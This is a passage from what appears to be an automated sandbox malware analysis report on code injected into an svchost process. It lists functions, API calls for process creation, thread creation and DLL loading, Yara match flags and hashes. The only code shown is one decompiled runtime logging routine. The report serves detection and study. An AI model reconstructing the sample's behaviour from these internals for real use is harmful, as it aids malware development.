                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: .z`
                  • API String ID: 3298025750-1441809116
                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                  • Instruction ID: 41b4406555993b6451ecc20becffdf62a7dbb4ca9c4c90a3e8e0bb30d237299d
                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                  • Instruction Fuzzy Hash: BBE012B1200208ABDB18EF99CC48EA777ADAF88750F018558FA085B241C630E910CAF0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02997303 Relevance: 3.2, APIs: 2, Instructions: 188threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 269 2997303-299730a 270 299730c-2997333 269->270 271 29972b2-29972bd 269->271 274 2997339-2997368 call 2997280 call 29a99d0 270->274 275 2997334 call 29aa140 270->275 272 29972c3-29972ca 271->272 273 29972be call 29a3e50 271->273 276 29972cc-29972de PostThreadMessageW 272->276 277 29972fe-2997302 272->277 273->272 286 2997370-29973a2 call 299d3d0 call 29a8780 274->286 275->274 279 29972fd 276->279 280 29972e0-29972fb call 29992a0 PostThreadMessageW 276->280 279->277 280->279 291 29973a4-29973ac 286->291 292 29973d7-29973df 286->292 293 29973ae-29973b5 291->293 294 29973c6-29973d0 291->294 293->294 295 29973b7-29973be 293->295 294->286 296 29973d2-29973d5 294->296 295->294 297 29973c0-29973c4 295->297 298 29973fd-299740f call 29a8710 296->298 297->294 300 29973e0-29973fa call 29aa0c0 297->300 298->292 303 2997411-299747c call 29a7f90 298->303 300->298 303->292 307 2997482-29974de call 29a7fd0 303->307 307->292 310 29974e4-2997531 call 29a9670 call 29a9690 call 29aa3b0 call 29aa0c0 call 29a3a50 307->310
                  APIs
                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029972DA
                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 029972FB
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID:
                  • API String ID: 1836367815-0
                  • Opcode ID: 12d56d79cf3f36f9817b8101316536266cb8448886980e29d7a3c9922b824347
                  • Instruction ID: 4fe82ba4568fb3f77e3462b6efd90aab87db5b0a0bd64110a8f2e73ea3a40c63
                  • Opcode Fuzzy Hash: 12d56d79cf3f36f9817b8101316536266cb8448886980e29d7a3c9922b824347
                  • Instruction Fuzzy Hash: 9A61A2B1940309AFDB24DF68DC85BEBB7E8EF49314F10446DE94997240DB70A941CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02997280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 029972DA
                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 029972FB
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID:
                  • API String ID: 1836367815-0
                  • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                  • Instruction ID: 840172340b037520552edbdd16cc4512c82cf3400455d9297674486f6076fd8d
                  • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                  • Instruction Fuzzy Hash: 5401D671A9032977EB21A6989C02FFEB76C5F81F61F140118FF04BA1C0EAD469068BF5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02999B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 588 2999b40-2999b5c 589 2999b64-2999b69 588->589 590 2999b5f call 29aaf70 588->590 591 2999b6b-2999b6e 589->591 592 2999b6f-2999b7d call 29ab390 589->592 590->589 595 2999b8d-2999b9e call 29a9720 592->595 596 2999b7f-2999b8a call 29ab610 592->596 601 2999ba0-2999bb4 LdrLoadDll 595->601 602 2999bb7-2999bba 595->602 596->595 601->602
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02999BB2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                  • Instruction ID: 3d6aa42067e6ed2dcb96b603b8fb7c786717426320a307960ea5e8167d6c5604
                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                  • Instruction Fuzzy Hash: 61011EB6D4020DBBEF10DAE4DC51F9DB3799B54318F0041A9A90897284F635EB14CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A8960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 603 29a8960-29a8979 604 29a897f-29a89b8 CreateProcessInternalW 603->604 605 29a897a call 29a91e0 603->605 605->604
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029A89B4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                  • Instruction ID: 16e794835fc234c2eea29beb2db3f42aa511e707f538dbc640c38b70e70fbc6f
                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                  • Instruction Fuzzy Hash: 2C01B2B2214208BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A895D Relevance: 1.5, APIs: 1, Instructions: 36processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029A89B4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: d69ef868ff5c1f0292c8b9e6ed8e17837b4da1c60a6d316eca2a4e23a4775800
                  • Instruction ID: 8ebd63c539e6a9df3a25c1d34076f53d243fa2bb534b647abd19edfee388fce1
                  • Opcode Fuzzy Hash: d69ef868ff5c1f0292c8b9e6ed8e17837b4da1c60a6d316eca2a4e23a4775800
                  • Instruction Fuzzy Hash: D2F0AFB6218548AFCB44DF98D890CEB77AABF8C358B119208FA5D93245D630E851CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A7430 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0299CCF0,?,?), ref: 029A746C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                  • Instruction ID: ccd558aae8874e8cc6b1a7a5ac34ba964a65a913fb1027f2926b1ea5240c1771
                  • Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                  • Instruction Fuzzy Hash: EDE06D333903043AE32065A99C02FA7B39D9B81B24F540026FA4DEA6C0D595F80146E8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A7423 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0299CCF0,?,?), ref: 029A746C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 07b290ec82c4285b7314288cee459288c413165614393ad76c693977952a164a
                  • Instruction ID: b7bd1816645546dee7c08ce4a67ab6b9dc37892aa0a98c7edc34fcff01b07eef
                  • Opcode Fuzzy Hash: 07b290ec82c4285b7314288cee459288c413165614393ad76c693977952a164a
                  • Instruction Fuzzy Hash: 6AF02B333803003BE330A5A89C03FAB77E9DB80B14F640019FA4DBB1C0D994B80187E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0299D429 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,02997C83,?), ref: 0299D45B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: 2af8399ffad47a47ff07c41bf41202de579e569c53ca12225c22a02f56f5bd23
                  • Instruction ID: c55c4999b9fad6d94df3b412ce010069a3074f10ff9846a4eb0f8bf8a6a4c2c1
                  • Opcode Fuzzy Hash: 2af8399ffad47a47ff07c41bf41202de579e569c53ca12225c22a02f56f5bd23
                  • Instruction Fuzzy Hash: 2CE026B621030427DB10FE58DC47F67738CAB43B84F494060F108A72C2DB20F4008274
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A8A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                  Download Yara Rule
                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0299CFC2,0299CFC2,?,00000000,?,?), ref: 029A8A80
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                  • Instruction ID: d95b3b6ff43628e508aebd425ab286b9ebd9a7f0fdd5fc1556896b6c725b2e20
                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                  • Instruction Fuzzy Hash: EEE01AB12002086BDB10DF49CC84EE737ADAF88650F018154FA0857241C930E910CBF5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A88B0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(029A3536,?,029A3CAF,029A3CAF,?,029A3536,?,?,?,?,?,00000000,00000000,?), ref: 029A88DD
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                  • Instruction ID: 12d5a715abcb264b2fdbc2fba9781b4b8b411dfa819a249aedb639629be4d3c0
                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                  • Instruction Fuzzy Hash: B2E012B1200208ABDB14EF99CC44EA777ADAF88654F118558FA085B241C630F910CBF0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0299D430 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,02997C83,?), ref: 0299D45B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                  • Instruction ID: c86ec5bceebd7a9acda53e19ba97672be585d63cb08399bac96fa4df1a31476a
                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                  • Instruction Fuzzy Hash: DCD05E717503042BEA10BAA89C12F26738D5B45A54F494064FA48962C3DA50E4008565
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0336967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 4444ae936700eaae73adfaf4aefbcd433a6db47f6b8027ba36d64aa4589a3b15
                  • Instruction ID: 254d0ed19f6d01c9f1a4768e9cce2a5880be08d8a6d4c3fb5f0e2d83501e69d1
                  • Opcode Fuzzy Hash: 4444ae936700eaae73adfaf4aefbcd433a6db47f6b8027ba36d64aa4589a3b15
                  • Instruction Fuzzy Hash: 0CB09B719015C5C9E611D7604B4871779047BD0751F16C0A1D1020641E477CC091F5B5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 033BFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E033BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0336CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E033B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E033B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                  0x033bfdda
                  0x033bfde2
                  0x033bfde5
                  0x033bfdec
                  0x033bfdfa
                  0x033bfdff
                  0x033bfe0a
                  0x033bfe0f
                  0x033bfe17
                  0x033bfe1e
                  0x033bfe19
                  0x033bfe19
                  0x033bfe19
                  0x033bfe20
                  0x033bfe21
                  0x033bfe22
                  0x033bfe25
                  0x033bfe40

                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033BFDFA
                  Strings
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033BFE01
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033BFE2B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                  • API String ID: 885266447-3903918235
                  • Opcode ID: d419c51b9a75e7162293f49ae42cb7fbe4e58d5022438a1875c4efbbfec92a59
                  • Instruction ID: a77c08b410e4a9bd98df8ba08318ef9d5aa08268d2e7542b81c55bc88d5f9bb8
                  • Opcode Fuzzy Hash: d419c51b9a75e7162293f49ae42cb7fbe4e58d5022438a1875c4efbbfec92a59
                  • Instruction Fuzzy Hash: D3F0C236A00201BFE6259A45DC82E67BB6AEB45730F144214F7285A9E1DA62F83086A4
                  Uniqueness

                  Uniqueness Score: -1.00%